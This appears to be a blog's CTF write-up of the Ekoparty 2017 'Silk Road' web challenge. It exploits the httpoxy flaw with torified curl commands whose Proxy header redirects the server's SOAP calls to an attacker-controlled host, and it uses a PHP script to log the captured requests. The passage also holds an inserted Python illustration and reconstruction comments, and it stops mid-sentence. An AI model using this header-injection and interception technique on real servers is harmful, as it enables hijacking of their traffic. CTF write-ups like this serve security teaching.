{"id":14695,"date":"2017-09-21T15:51:15","date_gmt":"2017-09-21T13:51:15","guid":{"rendered":"https:\/\/codisec.com\/?p=14695"},"modified":"2023-03-22T16:29:56","modified_gmt":"2023-03-22T15:29:56","slug":"ekoparty-2017-silk-road","status":"publish","type":"post","link":"https:\/\/codisec.com\/ekoparty-2017-silk-road\/","title":{"rendered":"Ekoparty 2017: Silk Road"},"content":{"rendered":"

CTF: EKOPARTY 2017
Points: 496
Category: Web

Description

“We will never make the same mistakes again, we challenge you to read our messages and earn some BTCs!” – DPR

https://silkroadzpvwzxxv.onion/

In this web challenge we’re presented with a website on the Tor network. To access it we can use Tor Browser, and torify for command-line tools like curl:

torify curl -v -k "https://silkroadzpvwzxxv.onion/"

The website consists of two pages:

1) Login panel [screenshot]

2) Registration panel at /register that turns out to be disabled… [screenshot]

Testing for common vulnerabilities like SQL Injection does not provide anything useful.
Let’s take a look at the headers:

$ torify curl -I -k "https://silkroadzpvwzxxv.onion/"
HTTP/1.1 200 OK
Date: Mon, 18 Sep 2017 11:10:02 GMT
Server: Apache
Set-Cookie: PHPSESSID=rsg6p15vnm7quglb9kte9e9sb0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Powered-By: PHP/7.0.8
Content-Type: text/html; charset=UTF-8

The interesting thing here is the PHP version, so let’s try to find some vulnerabilities.
Searching for php 7.0.8 vulnerability in Google leads us to something very interesting:

http://www.securiteam.com/securitynews/5YP321PJQC.html

More about this vulnerability:

https://httpoxy.org/

Quick test:

$ torify curl -v -k "https://silkroadzpvwzxxv.onion/" -H "Proxy: google.com"
…
HTTP/1.0 500 Internal Server Error
…

Excellent! We crashed the application!
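As an added illustration (not code from the write-up or the challenge), the Python below shows why a client-supplied Proxy header reaches the application's outbound HTTP client under CGI, and the two places a defender can break that chain; the request headers and the curl user agent are constructed values.

```python
"""httpoxy in miniature: a request header named "Proxy" becomes the
HTTP_PROXY environment variable under CGI/FastCGI, where outbound HTTP
clients such as PHP's SoapClient look for their proxy setting.
Added example, not code from the challenge; the headers are constructed."""
from typing import Dict, Optional


def cgi_meta_variables(headers: Dict[str, str]) -> Dict[str, str]:
    """Build HTTP_* meta-variables the way RFC 3875 gateways do:
    upper-case the header name, map '-' to '_', prefix HTTP_."""
    env = {"REQUEST_METHOD": "GET"}  # set by every CGI gateway
    for name, value in headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return env


def strip_proxy_header(headers: Dict[str, str]) -> Dict[str, str]:
    """Web-server-side fix: drop the header before it reaches the app
    (the effect of Apache's `RequestHeader unset Proxy early`)."""
    return {n: v for n, v in headers.items() if n.lower() != "proxy"}


def outbound_proxy(env: Dict[str, str], cgi_aware: bool) -> Optional[str]:
    """Proxy an outbound HTTP client would pick from its environment.
    A cgi_aware client ignores HTTP_PROXY whenever REQUEST_METHOD shows
    it is running inside a request handler, where the variable may have
    been set by a client header rather than by the administrator."""
    if cgi_aware and "REQUEST_METHOD" in env:
        return None
    return env.get("HTTP_PROXY")


# Constructed request mirroring the curl call in the write-up.
ATTACK_HEADERS = {
    "Host": "silkroadzpvwzxxv.onion",
    "User-Agent": "curl/7.55.1",  # constructed value
    "Proxy": "ourserver.hopto.org",
}

if __name__ == "__main__":
    env = cgi_meta_variables(ATTACK_HEADERS)
    print("naive client proxies via:", outbound_proxy(env, cgi_aware=False))
    print("cgi-aware client proxies via:", outbound_proxy(env, cgi_aware=True))
    safe_env = cgi_meta_variables(strip_proxy_header(ATTACK_HEADERS))
    print("after header strip:", outbound_proxy(safe_env, cgi_aware=False))
```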

Now let’s set up an Amazon instance with Tinyproxy and configure it to forward traffic to a local Apache server. The requests are made over HTTPS, so we’ll also need a domain (free from No-IP) and an SSL certificate (also free from Let’s Encrypt).

After successfully setting up our server, let’s see what requests are being sent:

$ torify curl -k "https://silkroadzpvwzxxv.onion/" -H "Proxy: ourserver.hopto.org"

Now we can take a look at /var/log/apache2/access.log on our server and see:

127.0.0.1 - - [18/Sep/2017:11:39:29 +0000] "POST /d90cdc7988b15060c1896126cee2eae9/hiddenservice_ws.php HTTP/1.1" 404 3750 "-" "PHP-SOAP/7.0.22-0ubuntu0.17.04.1"

/d90cdc7988b15060c1896126cee2eae9/hiddenservice_ws.php is a valid path on the challenge website, but when requested with GET it only returns an empty page. Let’s now create a file /d90cdc7988b15060c1896126cee2eae9/hiddenservice_ws.php on our web server and see what requests come from the challenge’s server:

<?php
// Append every request header and the raw request body to request.log.
// The opening lines (up to the foreach) were lost in extraction and are
// reconstructed here; getallheaders() matches the "Name : value" lines logged below.
$req_dump = "";
foreach (getallheaders() as $key => $val)
{
	$req_dump .= "$key : $val \n";
}

$req_dump .= "\n" . print_r(file_get_contents('php://input'), TRUE);
$fp = fopen('request.log', 'a');
fwrite($fp, $req_dump);
fclose($fp);
?>

After making the request with the Proxy header once again, we can see the contents of the request in request.log:

Host : hiddenservicehost 
Connection : close 
User-Agent : PHP-SOAP/7.0.22-0ubuntu0.17.04.1 
Content-Type : text/xml; charset=utf-8 
SOAPAction : "https://hiddenservicehost/d90cdc7988b15060c1896126cee2eae9/getCaptchaWord" 
Content-Length : 655 

<?xml version="1.0" encoding="UTF-8"?>
<!-- opening tags reconstructed from the closing tags; the namespace declarations on the Envelope element were not captured -->
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
  <SOAP-ENV:Body>
    <ns1:getCaptchaWord>
      <guid>6FF45265-5073-8C1B-1BE4-8DD77E546EE0</guid>
      <IP>127.0.0.1</IP>
      <length>6</length>
    </ns1:getCaptchaWord>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

It turns out that hiddenservice_ws.php serves a SOAP API, and this query is used to generate the captcha word. Fun fact: the original Silk Road was tracked down through a leaky captcha (at least the FBI claims so…); more about it here: https://krebsonsecurity.com/2014/09/dread-pirate-sunk-by-leaky-captcha/ – nice try Ekoparty ;).
Now with our proxy hack we can: